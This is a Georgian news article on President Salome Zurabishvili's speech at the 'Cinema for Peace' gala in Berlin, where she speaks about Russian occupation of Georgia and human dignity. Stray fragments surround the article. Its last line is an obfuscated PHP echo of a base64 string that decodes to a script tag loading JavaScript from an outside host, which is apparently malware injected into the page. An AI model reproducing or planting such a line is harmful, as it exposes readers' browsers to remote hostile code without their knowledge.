celsiusi
ავერსი შნაიდერი

მიუნხენის უსაფრთხოების კონფერენციის შემდეგ, პრეზიდენტი ბერლინში გაემგზავრა, სადაც მონაწილეობა მიიღო „კინო მშვიდობისთვის“ ორგანიზებით გამართულ გალაღონისძიებაზე. ინფორმაციას ამის შესახებ საქართველოს პრეზიდენტის ადმინისტრაცია ავრცელებს.

მათივე ცნობით, ღონისძიებას ესწრებოდნენ მსოფლიოს პოლიტიკისა და კულტურის სფეროს ცნობილი წარმომადგენლები, მათ შორის გერმანიის საგარეო საქმეთა მინისტრი ანალენა ბერბოკი, აშშ-ის ყოფილი სახელმწიფო მდივანი ჰილარი კლინტონი, გაერო-ს ყოფილი გენერალური მდივანი ბან კი მუნი.

საქართველოს პრეზიდენტმა ღონისძიების მონაწილეებს სიტყვით მიმართა და აღნიშნა, რომ „მშვიდობა, დემოკრატია და თავისუფლება დღევანდელ მსოფლიოში სასწორზე დევს და გამოწვევის წინაშეა“.

„ეს ჩემს ქვეყანაზე, საქართველოზე უკეთ ცოტამ თუ იცის. ზუსტად 103 წლის წინ, 1921 წლის 19 თებერვალს, ახალგაზრდა გოგონა მარო მაყაშვილი საქართველოში შემოჭრილი რუსეთის მე-11 არმიისათვის წინააღმდეგობის გაწევისას დაიღუპა – რუსეთსა და დამოუკიდებელ საქართველოს შორის ხელშეკრულების ხელმოწერიდან სულ რაღაც ცხრა თვის შემდეგ, რომელიც ამ საქართველოს სუვერენიტეტს აღიარებდა. რუსეთის ჯარები წინ მიიწევდნენ. ქვეყანა, რომელშიც ისინი შეიჭრნენ იყო სუვერენული და დემოკრატიული მოდელის კონსტიტუციით, რომელიც წინ უსწრებდა დროს და რომელშიც მაგალითად, არჩევნებში ქალების მიერ ხმის მიცემისა და ქალის არჩევის უფლებები სათანადოდ იყო აღიარებული. მაშინ დემოკრატია და თავისუფლება ჩაახშეს, დადგა ტერორისა და რეპრესიების დრო. ოკუპაცია 70 წელი გაგრძელდა, ხანგრძლივი 70 წელი, რომელიც ანადგურებდა ინტელექტუალურ და კულტურულ ელიტას, ცდილობდა, მოესპო თავისუფლებისა და დამოუკიდებლობისკენ სწრაფვა, მაგრამ ამაოდ.

რუსეთის მხრიდან მეორე აგრესია საბჭოთა რუსეთის დასრულებისა და საბჭოთა კავშირის დაშლისთანავე განხორციელდა. ამას მოჰყვა ჩემი ქვეყნის ნაწილების დე ფაქტო ოკუპაცია, რომელსაც გაყინული კონფლიქტების არასწორი ინტერპრეტაცია ჰქონდა. ეს 17 წელი გაგრძელდა. 2008 წელს მესამე შემოჭრამ რუსეთს ოკუპაციის კონსოლიდირებისა და ოკუპირებული ტერიტორიების რუსიფიკაციისკენ გაუხსნა გზა.

მსგავსი ისტორიის მოყოლა შეიძლება უკრაინაზე, მოლდოვაზე, რუსეთის თითქმის ყველა მეზობელზე, მათ შორის, ახლა უკვე გამქრალ პატარა კავკასიურ სახელმწიფოებსა და ენებზე, რომლებმაც საკუთარ ხორცსა და სისხლზე გამოსცადეს, რას ნიშნავს იყო იმ ქვეყნის მეზობელი, რომელმაც არ იცის თავისი საზღვრები, რომელიც არ ცნობს და პატივს არ სცემს სხვის სუვერენიტეტს, დამოუკიდებლობასა და თავისუფლებას, არ ცნობს ყველაფერზე მაღლა მდგომ ღირებულებებს – ადამიანის სიცოცხლესა და ღირსებას. და სწორედ ეს არის დემოკრატია. არა იმიტომ, რომ ეს თავისთავად აუცილებლად უკეთესი პოლიტიკური სისტემაა.

ჩვენ ვიცით, რომ დემოკრატია მოითხოვს დამოუკიდებელ ინსტიტუტებს, მიუკერძოებელ სასამართლოს, ძალაუფლების ბალანსს, უმცირესობების პატივისცემას და ჩვენ ამის მისაღწევად ვიბრძვით. მაგრამ უპირველეს ყოვლისა, ყოველივე ზემოთქმული მთავარი მიზნის მისაღწევი საშუალებებია, რათა დავიცვათ ჩვენი საერთო, მთავარი, შეუვალი, დაუმარცხებელი საგანძური – ადამიანის სიცოცხლე, ადამიანის ღირსება და ადამიანის თავისუფლება. უზრუნველვყოთ ის, რაც ძირითადი, დაუმარცხებელი საგანძურია, რომელიც ჩვენ ყველას საერთო გვაქვს – ადამიანის სიცოცხლე, ღირსება და თავისუფლება. ეს არის ის, რასაც უკრაინელები დღეს ჩვენთვის ყველაზე მტკიცედ იცავენ. დარწმუნებული ვარ, ჩვენ ყველანი ერთად დავდგებით, თუ და როდესაც კაცობრიობის წაშლის საფრთხის წინაშე აღმოვჩნდებით. სწორედ ეს გააკეთა მარო მაყაშვილმა იმ დღეს.

ყველა, ძველი თუ ახალი გამოწვევის მიუხედავად, ადამიანის სიცოცხლე და ღირსება ჩვენი საერთო ღირებულებაა. სწორედ ამას ემსახურება ეს ფორუმი და კინო მშვიდობისთვის; ამას ემსახურება ყველა ის ადამიანი, ვინც დღეს დაჯილდოვდა. ამას ემსახურება და ეს მისია აქვს რომის პაპს ფრანცისკეს, რასაც საქართველოს პატრიარქსა და მსოფლიოს ყველა რელიგიურ ლიდერთან ერთად იზიარებს.

მე ასევე მჯერა, რომ ჩვენთვის, ანალენა, პოლიტიკური ლიდერებისთვის ეს ყველაზე მაღალი ღირებულებაა, რომელიც უნდა დავიცვათ. ჩვენ ყველანი არჩეული ვართ არა კონკრეტული ინტერესების წარმოსადგენად, არა უფრო მეტი ძალაუფლების გამოსაყენებლად, არამედ ჩვენი ხალხის უფლებებისა და ღირსების, მათი თავისუფლებისა და უნიკალურობის დასაცავად“, – განაცხადა სალომე ზურაბიშვილმა.

ამასთან, საქართველოს პრეზიდენტის ადმინისტრაციის მიერ გავრცელებული ინფორმაციით, ღონისძიებაზე უკრაინის თავისუფლებაში შეტანილი წვლილისთვის, მშვიდობიანი მოსახლეობისა და ბავშვთა დაცვაში შეტანილი ჰუმანიტარული წვლილისთვის „კინო მშვიდობისთვის“ ჯილდო გადაეცათ რომის პაპს, გაერო-ს ყოფილ გენერალურ მდივანს, ბან კი მუნსა და აშშ-ის ყოფილ სახელმწიფო მდივანს, ჰილარი კლინტონს.

 
184
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");